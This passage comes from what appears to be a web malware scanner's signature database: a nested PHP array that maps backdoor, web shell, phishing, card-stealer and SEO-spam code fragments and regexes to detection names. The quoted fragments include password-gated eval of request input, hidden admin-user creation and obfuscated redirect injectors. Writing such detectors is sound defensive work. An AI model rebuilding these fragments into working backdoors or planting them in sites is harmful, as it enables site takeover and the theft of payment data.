		'(empty($_POST[\'security_code\'])) ?' => array(STR_CLEARFILE, 'php.backdoor.uploader.169.02', NULL),
		'if(isset($_POST["blah"]) && md5($_POST["blah"])' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.089', 'if\(isset\(\$_POST\["blah"\]\) && md5\(\$_POST\["blah"\]\)[^;]+eval\([^;]+\]\)\);[\s]*exit.0.;}'),
		'|.*|e\',);array_walk($arr, strval($_POST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.099', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$_POST\[[^]]+\]\)[\s]*&&[\s]*md5[^{]+\{[\s]*\$[\w]+[\s]*=[\s]*.return value[^}]+array_walk\([\s]*\$[\w]+,[\s]*strval\(\$_POST[^;]+;[\s]*\}[\s]*\}'),
	),

	'eval(' => array(STR_TRIGGER,

		'decrypt($' => array(STR_TRIGGER,

			'chr(ord(substr($' => array(STR_TRIGGER,
				'oZyincWnlatbWZWeo9adkrLFx9ar' => array(STR_CLEARFILE, 'php.backdoor.uploader.390', NULL),
				'pZufmY+pl6SNicjOrNWlk6u' => array(STR_CLEARFILE, 'php.backdoor.curl.031', NULL),
			),

			'if (file_exists($_GET["' => array(STR_CLEARFILE, 'php.backdoor.webshell.237', NULL),
		),

		'if(isset($_' => array(STR_TRIGGER,
			'if\(isset\(\$_(REQUEST|POST|GET)\[[^\]]+\]\)[\s]*&&[\s]*\(md5\(\$_(REQUEST|POST|GET)\[[^]]+\]\)[\s]*==[\s]*[\'"][\w]{25,}[\'"]\)[^}]+eval[^}]+}' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_isset.002', 'if\(isset\(\$_(REQUEST|POST|GET)\[[^\]]+\]\)[\s]*&&[\s]*\(md5\(\$_(REQUEST|POST|GET)\[[^]]+\]\)[\s]*==[\s]*[\'"][\w]{25,}[\'"]\)[^}]+eval[^}]+}'),
		),

		'var_dump(md5(' => array(STR_TRIGGER,
			'stripslashes($_POST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.096', 'var_dump\(md5\([^;]+;[\s]*\$[\w]+[\s]*=[\s]*stripslashes\(\$_POST\[[^;]+\);[\s]*eval\(\$[\w]+\);'),
		),
	),

	'exit' => array(STR_TRIGGER,

		': echo "' => array(STR_TRIGGER,
			': error_reporting(0); goto' => array(STR_TRIGGER,
				': set_time_limit(0); goto' => array(STR_TRIGGER,
					': if (!(md5($_GET["' => array(STR_CLEARFILE, 'php.malware.obfuscated.039', NULL),
				),
			),
		),

		'if\s*\(\s*isset\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+?\]\s*\)\s*&&\s*md5\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+?\]\s*\)\s*==\s*["\']\w+["\']\s*\)\s*\{\s*exit\s*\(?\s*\)?\s*;\s*\}' => array(REX_CLEAR_MULTIMATCH, 'php.malware.test0.002', 'if\s*\(\s*isset\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+?\]\s*\)\s*&&\s*md5\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+?\]\s*\)\s*==\s*["\']\w+["\']\s*\)\s*\{\s*exit\s*\(?\s*\)?\s*;\s*\}'),
		'exit;}else{echo "write_failed";}}unlink(' => array(STR_CLEARFILE, 'php.backdoor.uploader.373', NULL),
		'if(mail($_GET[\'email\'],"Working Id# ".$_GET[\'id\'],"Working ".$_GET[\'id\'])) print' => array(STR_CLEARFILE, 'php.hacktool.mailer.155', NULL),
	),

	'strrev' => array(STR_TRIGGER,

		'gzinflate' => array(STR_TRIGGER,

			').sha1(strrev($' => array(STR_TRIGGER,
				']:(isset($_COOKIE[' => array(STR_TRIGGER,
					'(str_replace("\n", \'\', \'' => array(STR_TRIGGER,
						')).substr(md5($' => array(STR_CLEARFILE, 'php.malware.obfuscated.037', NULL),
					),
				),
			),

			'if (isset($_POST[' => array(STR_TRIGGER,
				'create_function(\'\', $' => array(STR_CLEARFILE, 'php.malware.create_function.007', NULL),
			), 
		),

		':(isset($_COOKIE[' => array(STR_TRIGGER,
			'3\';error_reporting(0);$' => array(STR_CLEARFILE, 'php.malware.obfuscated.044', NULL),
		),
	),

	'if (@md5($_REQUEST[' => array(STR_TRIGGER,

		'$_POST[' => array(STR_TRIGGER,
			'@$get_theme_mod($_FILES[\'WP_Error\'][\'tmp_name' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader_POST.014', '(\$\w+)\s*=\s*.\w+.;\s*(\$\w+)\s*=\s*.\w+.;\s*(\$\w+)\s*=\s*\1\.\2[^;]+;\s*if\s*\(@md5\(\$_REQUEST\[.\w+.\]\)\s*==\s*.\w+.\)\s*.\3\(\$_FILES\[[^\[]+\[.tmp_name.\],\s*\$_POST\[[^\.]+\.\$_FILES\[[^\);]+\);'),
			'@$cp($_FILES[\'a\'][\'tmp_name' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.013', NULL),
		),

		'php echo __FILE__;' => array(STR_TRIGGER,
			'if (file_put_contents($_POST[' => array(STR_TRIGGER,
				'echo $_POST[' => array(STR_TRIGGER,
					'file_get_contents($_POST[' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.007', NULL),
				),
			),
		),
	),

	'localdate' => array(STR_TRIGGER,

		'if(substr(md5($' => array(STR_TRIGGER,
			'){eval($_GET[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.shell_get.002', 'if\(substr\(md5\(\$_GET\[.\w+.\]\),\d+,\d+\)\s*==\s*.\w+.\)\{eval\(\$_GET\[.\w+.\]\);\}'),
			'"teg_"' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.localdate.001', '(\$\w+)="teg_";\$\w+=strtoupper.\1\[[^;]+;\s*if.substr.md5[^;\)]+?localdate[^\?]+?;\s*\}(?:\s*\$_POST\s*tsop_\s*(\$\w+)="tsop_";\$\w+=strtoupper.\2\[[^;]+;\s*\$\w+=[^;]+;\s*\$\w+=\$[^;]+;.\);\s*\$\w+\(.\w+.\);)?'),
		),

		'system($time); exit;' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.localdate.002', 'if \(substr\(md5\(\$_GET\[.localdate[^\{\?]+\{\s*\$time[^;]+;\s*\@system..time.; exit;\s*\}'),
	),

	'substr(MD5(strrev($' => array(STR_TRIGGER,

		'if(isset($_COOKIE[' => array(STR_TRIGGER,
			'=@gzinflate($' => array(STR_TRIGGER,
				';unset($' => array(STR_TRIGGER,
					'header("Status: 404 Not Found");' => array(STR_CLEARFILE, 'php.backdoor.generic.054', NULL),
				),
			),
		),

		']:(isset($_' => array(STR_CLEARFILE, 'php.backdoor.pas_webshell.004', NULL),
	),

	'-BEGIN PUBLIC KEY' => array(STR_TRIGGER,
		'\'JPEG-1.1\'' => array(STR_TRIGGER,
			'echo \'Pong\';' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.magentoccstealer.001', '(\$\w+)[^;]+;\s*\$\w+[^;]+;\s*\$\w+[^;]+;\s*\$\w+\s*=\s*.-----BEGIN PUBLIC KEY[^;]+\s*END PUBLIC KEY[^<]+JPEG-1\.1.[\.\s]+base64_encode[^\?>]+touch\(\1[^;]+\);\s*\}'),
			'function encrypt(' => array(STR_CLEAR_MULTIMATCH, 'php.hacktool.magentoccstealer.001.02', '\$[\w]+[\s]*=[\s]*[^;]+;[\s]*\$[\w]+[\s]*=[^;]+;[\s]*\$[\w]+[\s]*=[\s]*"-----BEGIN PUBLIC KEY-----[^(]+function encrypt\(\$input,[^>]+@file_put_contents\([^;]+JPEG-1.1[^;]+FILE_APPEND\);[\s]*@touch[^;]+;[\s]*echo[\s]*.[\w]+.;'),
		),
	),

	'@extract($_REQ' => array(STR_TRIGGER,
		'if(@md5($_SERVER[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.extract.001', 'if\(\@md5.._SERVER..HTTP[^{]+\{[\s]*@extract\(\$_REQUEST\);[\s]*@?die[^;]+;[\s]*\}'),
		'@extract($_REQUEST);' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.extract.001.02', '@extract.._REQUEST.;'),
	),

	'$key=md5(sha1($' => array(STR_TRIGGER,
		'$txt=gzinflate($txt);' => array(STR_TRIGGER,
			'=chr(ord($' => array(STR_TRIGGER,
				'@eval(' => array(STR_CLEARFILE, 'php.backdoor.generic.051', NULL),
			),
		),
	),

	'%administrator%' => array(STR_TRIGGER,
		'$sql = "INSERT INTO ". $tbl_pre . "users(ID, user_login, user_pass, user_nicename' => array(STR_TRIGGER,
			'function generatePassword' => array(STR_CLEARFILE, 'php.backdoor.wp_adminadd.031', NULL),
		),
	),

	'if (isset($_GET[\'s\'])) { die' => array(STR_TRIGGER,
		': attachment; filename="\'' => array(STR_TRIGGER,
			'die(base64_decode($this->content' => array(STR_CLEARFILE, 'php.malware.dropper.005', NULL),
		),
	),

	'$zip->extractTo($' => array(STR_TRIGGER,
		'0777);' => array(STR_TRIGGER,
			'".md5(time()).md5(time());' => array(STR_CLEARFILE, 'php.backdoor.extract.004', NULL),
		),
	),

	'var linkMobile' => array(STR_TRIGGER,
		'var linkDesktop' => array(STR_TRIGGER,
			'var oneTimeShow' => array(STR_CLEARFILE, 'js.malware.downloader.001', NULL),
		),
	),

	' = substr(md5($random), 0,' => array(STR_TRIGGER,
		'rand(' => array(STR_TRIGGER,
			'header(' => array(STR_CLEARFILE, 'php.phishing.redirect.002', NULL),
		),
	),

	'";if(!empty(${$' => array(STR_TRIGGER,
		'"]},FILTER_VALIDATE_EMAIL)){$' => array(STR_TRIGGER,
			'"]}=md5(uniqid(rand(),true));if(filter_input(INPUT_POST,"' => array(STR_CLEARFILE, 'php.phishing.script.016', NULL),
		),
	),

	'substr(md5(strrev($' => array(STR_TRIGGER,
		'NULL\)[\s]*\{[\s]*(\$[\w]+)[\s]*=[\s]*md5\(\1\)[\s]*\.[\s]*substr\(md5\(strrev\(\1\)\)[\s]*,[\s]*[\d]+[\s]*,[\s]*strlen\(\1\)' => array(REX_CLEARFILE, 'php.backdoor.pas_webshell.001', NULL), //former php.backdoor.create_function.008, JAN 05 2017 renamed  on request by Denis since it's widely spreading; updated 11/2018 by PG
	),

	'function exploit($url){' => array(STR_TRIGGER,
		'$data = post(sprintf("%s://%s/admin/Cms_Wysiwyg/directive/index' => array(STR_CLEARFILE, 'php.backdoor.magento-login.003', NULL),
	),

	'$res=url_get_mini($url_to,' => array(STR_TRIGGER,
		'$wrdir."/".$wrpre."_".md5($secretkey' => array(STR_CLEARFILE, 'php.backdoor.uploader.085', NULL),
	),

	'isset($_REQUEST[\'php_code\']))' => array(STR_TRIGGER,
		'eval($_REQUEST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.019', 'if\(isset\(\$_REQUEST\[[^(]+\(md5\(\$_REQUEST[^{]+\{[\s]*eval.\$_REQUEST\[.php_code.\][\s]*\);[\s]*exit\([^;]+;[\s]*\}'),
	),

	'$String^$Gamma' => array(STR_TRIGGER,
		'function Uno_' => array(STR_CLEARFILE, 'php.spam-seo.uno_decoder.001', NULL),
	),

	'$tempfile=tempnam(__FILE__,\'\');' => array(STR_TRIGGER,
		'include($tmp);' => array(STR_CLEARFILE, 'php.backdoor.codeinclude.001', NULL),
	),

	'interface ANTISCAMMER_GENERAL' => array(STR_TRIGGER,
		'fwrite($' => array(STR_CLEARFILE, 'php.phishing.mailer.018', NULL),
	),

	'class StaticLinkProvider{' => array(STR_TRIGGER,
		'function getLinks($key, $count, $separator=\'|\'){' => array(STR_CLEARFILE, 'php.spam-seo.static_link_provider.002', NULL),
	),

	'$data = file_get_contents(\'php://input\');' => array(STR_TRIGGER,
		'die(substr(md5(microtime()), rand(' => array(STR_CLEARFILE, 'php.backdoor.uploader.146', NULL),
	),

	'if($_404 == true) echo die404();' => array(STR_TRIGGER,
		'rows=20>\'.file_get_contents(DATA.\'log.txt' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.084', NULL),
	),

	'$link = mysql_connect(' => array(STR_TRIGGER,
		'echo "\t\t<td>$col_value</td>\n";' => array(STR_CLEARFILE, 'php.spam-seo.injector.290', NULL),
	),
	
	'\'error: creating user \'' => array(STR_TRIGGER,
		'INSERT INTO `wp_users` (`user_login`,`user_pass`,`user_email`,`display_name`' => array(STR_CLEARFILE, 'php.backdoor.wpuser.008', NULL),
	),

	'($_REQUEST[chr(' => array(STR_TRIGGER,
		'= chr(60).chr(63).chr(112).chr(104).chr(112).chr(32);' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.345', 'if\(isset\(\$_[\w]+\[chr[^\n]+die\(\);[\s]*\}[\s]*'),
	),

	'<?php if(md5(@$_REQUEST[' => array(STR_TRIGGER,
		'{$filter1=$_REQUEST[\'_f1\'];$filter2=$_REQUEST[' => array(STR_CLEARFILE, 'php.backdoor.uploader.396', NULL),
	),

	'metaphone($l = $l.$license[' => array(STR_CLEARFILE, 'php.malware.injector.053', NULL),
	'print(md5(123456));echo file_put_contents($_POST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader_POST.002', 'print.md5.123456..;echo file_put_contents.._POST.[\\w]+.,._POST.[\\w]+..;'),
	'md5($ups) == $ups_md5 && !empty($HTTP_POST_FILES[\'uploadfile\']' => array(STR_CLEARFILE, 'php.backdoor.uploader.031', NULL),
	'if( md5($names[0])!=\'' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.eval_POST.031', 'if.isset.._POST..name... && is_array..[^$]+\\$names=array_values.._POST[^$]+if.[\\s]*md5..names[^;]+;[^;]+preg_replace[^$]+\\$_POST..[\\w]+....,[\\s]*.add..;'),
	'chr(47) . $array[2] . chr(47) . chr(101),' => array(STR_CLEARFILE, 'php.backdoor.preg_replace_POST.001', NULL),
	'=> \'1nj3c7 Sh311\' ,' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.071', NULL),
	'$data[\'name\'] = \'Zhano Zhano\';' => array(STR_CLEARFILE, 'php.backdoor.joomla-superuser.003', NULL),
	'if ($else_dot==1) {$new_v_f=fopen("$f_creat_name","w+");}' => array(STR_CLEARFILE, 'php.backdoor.file_get_contents.009.02', NULL),
	']));echo md5($_POST["' => array(STR_CLEARFILE,'php.backdoor.uploader_POST.004', NULL),
	'echo "good_check_thumb";' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.033', NULL),
	'$cmd = "wget -q \"$url\" -O $outputfile";' => array(STR_CLEARFILE,'php.backdoor.uploader.045', NULL),
	'if((isset($_COOKIE["secureid"]) && $_COOKIE["secureid"] == md5($login_vng)) and (isset($_COOKIE["pass' => array(STR_CLEARFILE,'php.backdoor.webshell.005', NULL),
	'ftpall($_POST[\'ftpip\'], $_POST[\'ftpuser\'], $_POST[\'ftppass\'], $_POST[\'goto\']' => array(STR_CLEARFILE,'php.backdoor.webshell.006', NULL),
	'preg_replace("\043\056\052\043\145",' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.code_password.001', 'if\s*.md5.._POST..\w+?... == .\w{32}..\s*\{\s*preg_replace...043.056.052.043.145.,[^\)]+\);\s*\}'),
	'shell_get.php?' => array(STR_CLEARFILE, 'php.backdoor.shell_get.001', NULL),
	'$sslChecker($getUrl,\'e\'.' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.sslChecker.001', 'if.isset.._(REQUEST|POST)..pas.\]\) [^\{]+?\{\$sslChecker=.pre[^\}]+?url"\);\}'),
	'Coded By Anonisma' => array(STR_CLEARFILE, 'php.phishing.anonisma_free_tools.004', NULL),
	'$path = \'/system/mngr.php?id=\' . $this->_id . \'&md5=\' . md5($this->_read($this->_db_file' => array(STR_CLEARFILE, 'php.spam-seo.generic.014', NULL),
	'md5("9e4f6c16cc6cb6075b657cb96f8b0d44' => array(STR_CLEARFILE, 'php.spam-seo.generic.016', NULL),
	'update_option("rss_".md5($blogurl."_sh"' => array(STR_CLEARFILE, 'php.spam-seo.fake-wp-cache.001', NULL),
	'$ff=fopen($dira.md5(\'links.txt\'),\'w\');' => array(STR_CLEARFILE, 'php.spam-seo.injector.053', NULL),
	'aHR0cDovL3Byb21vY2FzaW5vLnJ1Lw==' => array(STR_CLEARFILE,'php.spam-seo.redirect.014',NULL),
	'$file = fopen("drspam.txt' => array(STR_CLEARFILE,'php.phishing.generic.020', NULL),
	'$_SERVER[\'HTTP_USER_AGENT\']="THISISTESTOPEN";' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.black_hat_client.001', 'ini_set\(.display_errors.,..ff.\);[\s]*ignore_user_abort\(1\);[\s]*\$[\w]+[\s]*=.[\d\.]+.;[\s]*\$[\w]+[\s]*=[\s]*\$_SERVER\[.SERVER_NAME.\][\s]*\.[\s]*\$_SERVER\[.REQUEST_URI.\];[\s]*\$[\w]+[\s]*=[\s]*str_ireplace\(.http[^@]+@chmod[^\?]+\?ineed[^#]+@preg_match..#[^\?]+\?>[^\?]+return[\s]*urlencode\(\$[\w]+\);[\s]*\};'),
	'error_reporting(0);@array_map' => array(STR_CLEAR_LINEMATCH,'php.backdoor.array_callback.002', 'if\(\(md5\(@\$_COOKIE\[.[\w]+.\]\)=="\w+"\)\)\{error_reporting\(0\);\@array_map[^,]+,\(array\)(\s*base64_decode\(\$_POST\[\w+\]\)\);\}\s*if\(\(\@\$_COOKIE[^\{]+\{die\(md5[^}]+\})?(\s*\$_SERVER\[\w+\]\);\})?'),
	'if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}' => array(STR_CLEARFILE,'php.backdoor.uploader.059', NULL),
	'$ok = @file_put_contents("$testwrite/$md5.txt", $time) !== false;' => array(STR_CLEARFILE, 'php.backdoor.webshell.018', NULL),
	'$x=md5(microtime());$xx=sha1(microtime());' => array(STR_CLEARFILE, 'php.phishing.redirect.010', NULL),
	'."userid=email"." &&".md5(time()).md5(time()).md5(time()).md5(time());' => array(STR_CLEARFILE, 'php.spam-seo.redirect.065', NULL),
	']==\'1\'){echo \'200\'; exit;}' => array(STR_CLEARFILE, 'php.malware.generic.044', NULL, 1),
	'gzINFLATe($e))&&(md5(SUBsTr($e,' => array(STR_CLEARFILE, 'php.backdoor.pas_webshell.005', NULL),
	'"password">Shell Password:' => array(STR_CLEARFILE, 'php.backdoor.webshell.083', NULL),
	'>Uploaded By Back-DOOR<' => array(STR_CLEARFILE, 'php.malware.generic.070', NULL),
	'$install_code = str_replace(\'{$PASSWORD}\' , $install_hash, base64_decode( $install_code ));' => array(STR_CLEARFILE, 'php.spam-seo.wp_cd.002', NULL),
	'$victim = unserialize(file_get_contents(FOLDER.\'ph_v_data_\'.$id.".pdb' => array(STR_STOP, 'php.hacktool.ransomware.002', NULL),
	'echo @serialize(Array(\'php\' => @phpversion(),' => array(STR_CLEARFILE, 'php.backdoor.uploader.239', NULL),
	'CONF_PASSWORD_HASH == md5($_POST[\'password\'])) { switch ($_POST[\'action\']) { case \'link' => array(STR_CLEARFILE, 'php.backdoor.injector.119', NULL),
	'if (!$mail->Send()) die (\'Mailer Error: \'.$mail->ErrorInfo);' => array(STR_CLEARFILE, 'php.phishing.mailer.059', NULL),
	'<a href="http://www.dangerousmailer.com' => array(STR_CLEARFILE, 'php.hacktool.mailer.097', NULL),
	'>Edit user XPlo' => array(STR_CLEARFILE, 'php.backdoor.adduser.001', NULL),
	'$needvalue=mysqli_query($dbcon,$sql);$needvalue=mysqli_fetch_array($needvalue);' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.064', NULL),
	'sendFile($url[\'host\'], $url[\'path\'] . "?upload=1", $name, $content);' => array(STR_CLEARFILE, 'php.backdoor.uploader.009', NULL),
),

'\x7' => array(STR_TRIGGER,

	'var _' => array(STR_TRIGGER,

		'"\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65"' => array(STR_TRIGGER,

			']));</script>' => array(STR_TRIGGER,
				'javascript.>[\s]*var[\s]*_0x[\w]+[\s]*=[\s]*\["",".x6A.x' => array(REX_CLEAR_LINEMATCH, 'js.spam-seo.injector.047.03', '<script type[\s]*=[\s]*.text.javascript.>[\s]*var[\s]*_0x[\w]+[\s]*=[\s]*\["",".x6A.x6F[^<]+\]\)\);<.script>'),
			),

			'["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.047', 'var _0x[\w]+=\["",[^\]]+.x74.x70.x69.x72.x63.x73.x3C[^\]]+\];document\[_0x[^)]+\)[^)]+\)[^)]+\]\)\)'),
		),

		'\x42\x4C\x4F\x47\x20\x53\x54\x41\x52\x54\x53\x20\x48\x45\x52\x45' => array(STR_WHITE,
			'\x68\x61\x73\x68","\x6C\x6F\x63\x61\x74\x69\x6F\x6E' => array(STR_CLEARFILE, 'html.phishing.generic.048', NULL), 
		),

		'|msn.)/i)){document[_0x' => array(STR_TRIGGER,
			'"\x53\x74\x61\x74\x73\x4F\x6E\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65"' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.019', 'var _0x[\\w]+=\\[".x53.x74.x61[^\\]]+\\];if.document[^}]+\\}\\}'),
		),

		'\x2F\x77\x61\x72\x2F\x6D\x6F\x63\x2E\x6E\x69\x62\x65\x74\x73\x61\x70\x2F\x2F\x3A' => array(STR_TRIGGER,
			'\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_' => array(STR_CLEAR_LINEMATCH, 'js.malware.pastebin_reversed.002', 'var (_0x\w+)=\["",".x6A.x[^\]]+x65.x74.x73.x61.x70.x2F.x2F.x3A[^]]+\];document\[\1\[[^;\{]+?\[1\]\]\(\1\[0\]\){1,2}'),
		),

		'\\\x3D\\\x63\\\x72\\\x73\\\x20\\\x74\\\x70\\\x69\\\x72\\\x63\\\x73\\\x3C\",\"\\\x77\\\x72\\\x69\\\x74\\\x65\"];document[_' => array(STR_TRIGGER,
			'\\\x2F\\\x77\\\x61\\\x72\\\x2F\\\x6D\\\x6F\\\x63\\\x2E\\\x6E\\\x69\\\x62\\\x65\\\x74\\\x73\\\x61\\\x70\\\x2F' => array(STR_CLEAR_LINEMATCH, 'js.malware.pastebin_reversed.003', 'var (_0x\w+)=\[.".",."(..)x6A\2x[^\]]+x65\2x74\2x73\2x61\2x70\2x2F\2x2F\2x3A[^]]+\];document\[\1\[[^;\{]+?\[1\]\]\(\1\[0\]\){1,2}'),
		),

		'\x68\x74\x74\x70\x3A\x2F\x2F\x6B\x6A\x7A\x30\x72' => array(STR_CLEARFILE, 'php.spam-seo.injection.098', NULL),
		'\x61\x6E\x6B\x20\x6F\x66\x20\x41\x6D\x65\x72\x69\x63\x61' => array(STR_CLEARFILE, 'html.phishing.bankofamerica.010', NULL), 
		'\x23\x63\x63\x5F\x6E\x75\x6D\x62\x65\x72' => array(STR_CLEARFILE, 'html.phishing.paypal.016', NULL), 
		'\x74\x69\x74\x6C\x65","\x50\x61\x79\x50\x61\x6C\x20\x2D\x20\x54\x68\x61\x6E\x6B\x73\x2E' => array(STR_CLEARFILE, 'html.phishing.paypal.016.02', NULL), 
		'\x23\x62\x74\x6E\x4C\x6F\x67\x69\x6E","\x23\x62\x74\x6E\x5F\x6D\x79\x61\x63\x63\x6F\x75\x6E\x74' => array(STR_CLEARFILE, 'html.phishing.paypal.016.03', NULL), 
		'\x6F\x6E\x63\x6C\x6B\x64\x73\x2E\x63\x6F\x6D\x2F' => array(STR_CLEAR_LINEMATCH, 'js.malware.unwanted-ads.005', 'var\s*\w+\s*=\s*\[[\'"][^@]+.x68.x74.x74.x70.x73.x3A.x2F.x2F.x6F.x6E.x63.x6C.x6B.x64.x73.x2E.x63.x6F.x6D.x2F[^\]]+\];\s*function\s*\w+\([^;]+;\s*var\s*\w+\s*=\s*new\s*Date\(\);if[^}]+};[^;]+;\s*document[^;]+;\s*var[^;]+;\s*if\(\([^=]+=\s*document\[[^;]+;if\(\w+\s*==\s*(\-)?\d+\)\s*{return\s*null\s*}\s*;\s*var\s*\w+=document\[[^;]+;\s*if\([^;]+;\s*return\s*unescape\(document\[[^}]+}if\s*\(navigator[^;]+;\s*window\[\w+\[\d+\]\][^}]+}}'), 
		'x73\x63\x72\x69\x70\x74\x3E"];document.writeln(_$[0]);' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.035', '<script[^<]+var _\\$[\\s]*=[\\s]\\[\".x3C.x73.x63.x72[^\\]]+\\];[\\s]*document.writeln._\\$\\[0\\]\\);[\\s]*<.script>'),
		'$js = \'<script>var _$=["location","href","\'.$redirect.\'"];window[_$[0]][_$[1]]=_$[2];</script>\';' => array(STR_CLEARFILE, 'php.spam-seo.injector.160', NULL),
		'\x2E\x69\x6E\x66\x6F\x2F","' => array(STR_CLEAR_LINEMATCH, 'js.malware.free-tools_info.001', 'var _0x\w{4}=\[".x[^\]]+?\\\x2E\\\x69\\\x6E\\\x66\\\x6F\\\x2F",".+?\]\]\(\)\.toString\(\)\[.+\);\} ;'),
		'\x6D\x65\x64\x4D\x65\x7C\x70\x61\x79\x6D\x65\x6E\x74\x7C\x5F\x63\x63\x5F\x6E\x75\x6D\x62\x65\x72\x7C' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.011', 'var _0x[\\w]+=\\[\".x[^\\]]+.x6D.x65.x64.x4D.x65.x7C.x70.x61.x79.x6D.x65[^\\]]+\\];eval.function._0x[^-]+--[^>]+0,\\{\\}\\)\\);'),
		'\x67\x6F\x2E\x61\x64\x32\x75\x70\x2E\x63\x6F\x6D' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.026', 'var\s*\_\w+=\[..x68.x72.x65.x66.\,..x6C.x6F.x63.x61.x74.x69.x6F.x6E.\,..x68.x74.x74.x70.x73.x3A.x2F.x2F.x67.x6F.x2E.x61.x64.x32.x75.x70.x2E.x63.x6F.x6D.x2F.x61.x66.x75.x2E.x70.x68.x70.x3F.x69.x64.x3D.x34.x37.x33.x37.x39.x31[^\;]+\;function\s*\_\w+\(\)\{window[^\;]+\;var\s*\_\w+\s*\=\s*new\s*Date\(\)\;if[^\;]+\;[^\;]+\;document\[\_\w+[^\;]+\;var\s*\_\w+\=[^\;]+\;if[^\=]+\=\s*document[^\;]+\;if[^\;]+\;var\s*\_\w+\=document[^\;]+\;if[^\;]+\;return\s*unescape\(document[^\;]+\;if\(window[^\;]+\;if\(document[^\}]+\}else\s*\{if\(window[^\}]+\}else\s*\{window\[\_\w+\[\d+\]\]\(\_\w+\[\d+\]\,\_\w+\)\}+'),
		'var _0x[\w]+[\s]*=[\s]*\[".x...x...x...x...x...[^;]{1000}[^;]+\];[\s]*var[\s]*_0x[\w]+[\s]*=[\s]*\[_0x[\w]+\[[\d]+\],[\s]*_0x[\w]+\[[\d]+\],' => array(REX_CLEAR_LINEMATCH, 'js.spam-seo.redirect.041.08', 'var _0x[\w]+=\[".x...x...x[^;]{2000}[^;]+;[\s]*(var _0x[\w]+=\[_0x[\w]+\[0\],_0x[\w]+\[1\],_0x[\w]+\[2[^;]+;[\s]*)+[^\n]+[\}\)\(]{5};'),
	),

	'preg_replace' => array(STR_TRIGGER,

		'\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28' => array(STR_TRIGGER, 
			'if( preg_match_all(\':>([^<]+)<:s\', php_strip_whitespace(__FILE__), $' => array(STR_CLEARFILE, 'php.backdoor.filesman.071', NULL),
			'\x29\x29\x29\x3B","\x2E");' => array(STR_CLEARFILE, 'php.backdoor.generic-webshell.009', NULL),
		),

		'preg_replace("/.+/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66' => array(STR_TRIGGER,
			'\x29\x29\x29\x3B",".");' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.135', 'preg_replace."....e",".x65.x76.x61.x6C.x28.x67.x7A.x69.x6E.x66.x6C[^\\)]+.x29.x29.x29.x3B",".".;'),
		),

		'@preg_replace("@(.+)@ie", "\x65\166\x61\154\x28' => array(STR_TRIGGER,
			'\47\x43\155\x6c\155\x49\103\x67\150\x59\62\x78\150\x63\63\x4e\146\x5a\130\x68\160\x63\63\x52\172\x4b\103\x64\156\x63\155\x46\167\x5a\130\x5a\160' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.grapevine.001', '\@preg_replace."\@\(\.\+\)\@ie", ".x65.166.x61[^"\);]+?.x28.47.x43.155.x6c[^"\);]+?.x27.51.x29.73", "\."\);'),
		),

		'esi","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_preg_replace.004', 'preg_replace\s*\(.\/\.\+\/esi.,..x65.x76.x61.x6C.x28.x62.x61.x73.x65.x36.x34.x5F.x64.x65.x63.x6F.x64.x65.x28[\'"&#039][^\)]+\)\s*;'),
		';preg_replace(\'/.*/e\',"\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x24' => array(STR_CLEARFILE, 'php.backdoor.filesman.106', NULL),
	),

	'.$' => array(STR_TRIGGER,

		'"."' => array(STR_TRIGGER,
